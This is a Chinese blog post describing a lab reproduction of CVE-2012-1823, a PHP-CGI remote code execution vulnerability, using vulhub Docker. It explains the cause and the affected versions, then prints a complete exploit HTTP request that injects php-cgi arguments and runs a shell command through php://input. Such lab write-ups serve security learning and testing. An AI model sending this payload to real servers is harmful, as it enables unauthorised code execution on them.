PHP-CGI远程代码执行漏洞(CVE-2012-1823)

最新推荐文章于 2024-08-12 10:11:14 发布
最新推荐文章于 2024-08-12 10:11:14 发布
阅读量1.4k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824777
版权

声明

好好学习,天天向上

漏洞描述

回到本漏洞。CVE-2012-1823就是php-cgi这个sapi出现的漏洞,我上面介绍了php-cgi提供的两种运行方式:cgi和fastcgi,本漏洞只出现在以cgi模式运行的php中。

这个漏洞简单来说,就是用户请求的querystring被作为了php-cgi的参数,最终导致了一系列结果。

探究一下原理,RFC3875中规定,当querystring中不包含没有解码的=号的情况下,要将querystring作为cgi的参数传入。所以,Apache服务器按要求实现了这个功能。

影响范围

php < 5.3.12

php < 5.4.2

复现过程

这里使用5.4.1版本

使用vulhub

/app/vulhub-master/php/CVE-2012-1823

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

抓包,修改

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.239.129:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
PHP imap 远程命令执行漏洞复现(CVE-2018-19518)
0xSec
12-27 1189
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
CVE-2012-1823PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1403
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
PHP imap 远程命令执行漏洞CVE-2018-19518)
黑白的博客
12-30 985
声明 好好学习,天天向上 漏洞描述 University of Washington IMAP Toolkit 2007f是美国华盛顿大学(University of Washington)的一款IMAP(Internet消息访问协议)工具包。 基于UNIX平台的University of Washington IMAP Toolkit 2007f中的‘imap_open()’函数存在操作系统命令注入漏洞,该漏洞源于程序没有正确的验证server URI。远程攻击者可借助‘imap_rimap’和‘tcp_
漏洞复现-PHP-CGI Windows平台远程代码执行漏洞CVE-2024-4577)
最新发布
玄道的网安博客
08-12 999
语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。
php cgi 执行,php cgi远程任意代码执行漏洞
weixin_39520353的博客
03-10 145
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。另外关于RCE的PoC原文没有给...
PHP-CGI远程代码执行漏洞分析与防范
10-19
PHP-CGI远程代码执行漏洞CVE-2012-1823)是一个严重的安全漏洞,它允许远程攻击者通过构造特殊的HTTP请求,执行任意PHP代码。这个漏洞主要影响以CGI模式运行的PHP,而以FastCGI模式运行的PHP-FPM不受影响。之所以...
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 2170
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
weixin_45653478的博客
06-27 941
CVE-2024-4577是一个在Windows平台上运行的PHP CGI(Common Gateway Interface)的远程代码执行漏洞。该漏洞的存在主要是因为PHP在设计时未能预见到Windows系统的Best-Fit字符编码转换特性,导致攻击者可以通过构造特定的请求来绕过安全限制,从而在远程PHP服务器上执行任意代码
P1 利用Vulnhub复现漏洞 - PHP imap 远程命令执行漏洞CVE-2018-19518)
在下小黄的博客
03-19 561
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P1 利用Vulnhub复现漏洞 - PHP imap 远程命令执行漏洞CVE-2018-19518) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月19日 软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器 PHP imap 远程命令执行漏洞CVE-2018-19518)一级目录二级目录三级目录 一级目录 二级目录 三级目录 各位路过的朋友,如果觉得可
[Vulhub] PHP imap远程命令执行漏洞CVE-2018-19518)
weixin_45605352的博客
05-08 1775
0x01 预备知识 PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。 php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
PHP CGI漏洞-cve:2012-1823
arissa666的博客
07-08 75
看下phpinfo文件是否存在。用msf攻击配置后进行攻击。
CVE-2012-1823 php-cgi远程代码执行
cnbird's blog
12-22 2518
CVE-2012-1823php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ via:knownsec POC: 1、本地包含直接执行代码: curl -H "USER-AGENT: " h
CVE-2012-1823PHP-CGI远程代码执行漏洞(80端口)
m0_62670778的博客
05-12 723
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi
CVE-2018-19518 PHP-IMAP 复现和学习 (环境CTFShow web312)
paidx0
08-09 473
CVE-2018-19518复现和学习 漏洞描述 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubuntu中默认使用ssh来代替rs
vulhub靶场php环境下的CVE-2012-1823PHP-CGI远程代码执行漏洞
m0_73248913的博客
02-12 456
msf解决vulhub
CVE-2012-1823PHP-CGI RCE)的PoC及技术挑战
Yatere的天平秤
05-07 2157
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。  另外关于RC
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值